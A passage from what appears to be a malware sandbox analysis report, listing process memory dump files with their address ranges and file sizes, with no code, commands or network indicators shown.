                                                                                                                                                                                          4.7MB

                                                                                                                                                                                        • memory/4084-22-0x00000000003A0000-0x0000000000856000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.7MB

                                                                                                                                                                                        • memory/4084-21-0x00000000003A0000-0x0000000000856000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.7MB

                                                                                                                                                                                        • memory/4084-20-0x00000000003A0000-0x0000000000856000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.7MB

                                                                                                                                                                                        • memory/4084-16-0x00000000003A0000-0x0000000000856000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.7MB

                                                                                                                                                                                        • memory/4668-2-0x00000000000E1000-0x000000000010F000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          184KB

                                                                                                                                                                                        • memory/4668-4-0x00000000000E0000-0x0000000000596000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.7MB

                                                                                                                                                                                        • memory/4668-0-0x00000000000E0000-0x0000000000596000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.7MB

                                                                                                                                                                                        • memory/4668-18-0x00000000000E0000-0x0000000000596000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.7MB

                                                                                                                                                                                        • memory/4668-3-0x00000000000E0000-0x0000000000596000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.7MB

                                                                                                                                                                                        • memory/4668-1-0x0000000077A24000-0x0000000077A26000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          8KB

                                                                                                                                                                                        • memory/5568-8579-0x00007FF640EC0000-0x00007FF6419BF000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          11.0MB

                                                                                                                                                                                        • memory/5568-8557-0x00007FF640EC0000-0x00007FF6419BF000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          11.0MB

                                                                                                                                                                                        • memory/5840-8582-0x00007FF724C20000-0x00007FF72571F000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          11.0MB

                                                                                                                                                                                        • memory/5840-8970-0x00007FF724C20000-0x00007FF72571F000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          11.0MB

                                                                                                                                                                                        • memory/5884-11453-0x00000000003A0000-0x0000000000856000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.7MB

                                                                                                                                                                                        • memory/5884-11455-0x00000000003A0000-0x0000000000856000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.7MB

                                                                                                                                                                                        • memory/5904-8644-0x000002152F7B0000-0x000002152F7CC000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          112KB

                                                                                                                                                                                        • memory/5904-8704-0x000002152F890000-0x000002152F89A000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          40KB

                                                                                                                                                                                        • memory/5904-6764-0x00000000003C0000-0x0000000000A65000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          6.6MB

                                                                                                                                                                                        • memory/5904-4391-0x00000000003C0000-0x0000000000A65000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          6.6MB

                                                                                                                                                                                        • memory/5904-8892-0x000002152FA90000-0x000002152FA9A000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          40KB

                                                                                                                                                                                        • memory/5904-8891-0x000002152FA80000-0x000002152FA86000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          24KB

                                                                                                                                                                                        • memory/5904-8890-0x000002152FA20000-0x000002152FA28000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          32KB

                                                                                                                                                                                        • memory/5904-8889-0x000002152FAA0000-0x000002152FABA000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          104KB

                                                                                                                                                                                        • memory/5904-8645-0x000002152F7D0000-0x000002152F885000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          724KB

                                                                                                                                                                                        • memory/5904-8888-0x000002152FA10000-0x000002152FA1A000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          40KB

                                                                                                                                                                                        • memory/5904-8877-0x000002152FA30000-0x000002152FA4C000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          112KB

                                                                                                                                                                                        • memory/6136-8991-0x0000000000D00000-0x0000000000FBC000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          2.7MB

                                                                                                                                                                                        • memory/6136-8536-0x0000000000D00000-0x0000000000FBC000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          2.7MB

                                                                                                                                                                                        • memory/6136-8535-0x0000000000D00000-0x0000000000FBC000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          2.7MB

                                                                                                                                                                                        • memory/6136-9132-0x0000000000D00000-0x0000000000FBC000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          2.7MB

                                                                                                                                                                                        • memory/6136-8534-0x0000000000D00000-0x0000000000FBC000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          2.7MB

                                                                                                                                                                                        • memory/6312-8106-0x0000000000470000-0x0000000000912000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.6MB

                                                                                                                                                                                        • memory/6312-6221-0x0000000000470000-0x0000000000912000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.6MB

                                                                                                                                                                                        • memory/6312-1721-0x0000000000470000-0x0000000000912000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.6MB

                                                                                                                                                                                        • memory/6372-3015-0x00000000003A0000-0x0000000000856000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.7MB

                                                                                                                                                                                        • memory/6372-3029-0x00000000003A0000-0x0000000000856000-memory.dmp

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4.7MB